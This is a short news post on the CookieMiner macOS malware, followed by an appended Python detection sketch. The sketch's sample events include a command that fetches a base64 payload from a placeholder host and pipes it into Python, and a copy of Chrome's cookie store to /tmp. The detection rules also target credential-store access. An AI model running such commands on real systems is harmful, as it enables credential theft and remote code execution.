News CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS

A new type of malware has been discovered, nicknamed 'CookieMiner' for its ability to steal cryptocurrency exchange cookies from the browser. It can also steal SMS messages, and financial and personal credentials from browsers. This has all been compiled by researchers, and it leads them to believe that this deadly new malware could let an attacker bypass multi-factor authentication.

This malware is mostly a scare for Mac users. It does have the ability to download a base64-encoded Python script that it uses to retain a connection to the victim's computer.

The malware starts its attack with a shell script that steals browser cookies and sends a copy of them to a folder on a remote server. It then proceeds to target cookies associated with various crypto-exchanges. On top of all of this, it also installs a crypto-miner that utilizes the CPU [not the GPU] in order to mine Koto, a Zcash-based cryptocurrency.

  The researchers also stated the following: 

“CookieMiner downloads a Python script named “harmlesslittlecode.py” to extract saved login credentials and credit card information from Chrome’s local data storage. CookieMiner adopts techniques from the Google Chromium project’s code for its decryption and extraction operations and abuses them.”

Above all of this, because the malware is able to use browser cookies, it's speculated that it may be able to bypass certain login conditions on websites, and hence the website would never send an alert or notification that there had been suspicious logins by a user.

  There has been no mode of entry that has been identified, but researchers involved in the matter stated that all users of a crypto wallet and/or exchange should keep a close eye on their wallets.

Original article can be found here.

That was the news, folks. Have a good week, and stay safe out there.

01001001 00100000 01000001 01001101 00100000 01011010 01001111 01000100 01001001 01000001 01000011
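
A detection sketch for the behaviours described in the post above, as an added example that is not part of the original post or the researchers' code: it scans process-execution events for the script name quoted above, a base64 decode piped into Python, and a non-browser process touching Chrome's default macOS profile stores. The event format, host name and user paths are assumptions constructed for the example.

```python
import re

# Constructed sample of process-execution telemetry: (process name, command line).
# Host and user paths are placeholders, not indicators from the research.
SAMPLE_EVENTS = [
    ("Google Chrome", "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"),
    ("sh", "sh -c curl -s http://example.invalid/a.b64 | base64 -D | python"),
    ("python", "python harmlesslittlecode.py"),
    ("cp", "cp /Users/alice/Library/Application Support/Google/Chrome/Default/Cookies /tmp/c"),
    ("zsh", "zsh -c ls /Users/alice/Documents"),
]

# Processes expected to open the browser's own stores (assumed allow-list).
BROWSERS = {"Google Chrome", "Google Chrome Helper", "Safari"}

# Chrome's default profile stores on macOS: cookies, saved logins, saved cards.
CHROME_STORE = re.compile(
    r"Library/Application Support/Google/Chrome/[^/]+/(Cookies|Login Data|Web Data)\b")
# A base64 decode step feeding a Python interpreter on the same command line.
B64_TO_PY = re.compile(r"base64\s+(-D|-d|--decode)\b.*\|\s*python[\d.]*\b")
# Script name quoted by the researchers in the post above.
NAMED_SCRIPT = re.compile(r"\bharmlesslittlecode\.py\b")


def classify(process, cmdline):
    """Return the names of the rules that one event matches."""
    hits = []
    if NAMED_SCRIPT.search(cmdline):
        hits.append("named-script")
    if B64_TO_PY.search(cmdline):
        hits.append("base64-to-python")
    if process not in BROWSERS and CHROME_STORE.search(cmdline):
        hits.append("non-browser-touches-chrome-store")
    return hits


def scan(events):
    """Return (index, process, hits) for every event that matched a rule."""
    findings = []
    for i, (process, cmdline) in enumerate(events):
        hits = classify(process, cmdline)
        if hits:
            findings.append((i, process, hits))
    return findings


if __name__ == "__main__":
    for idx, proc, hits in scan(SAMPLE_EVENTS):
        print(idx, proc, ", ".join(hits))
```
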
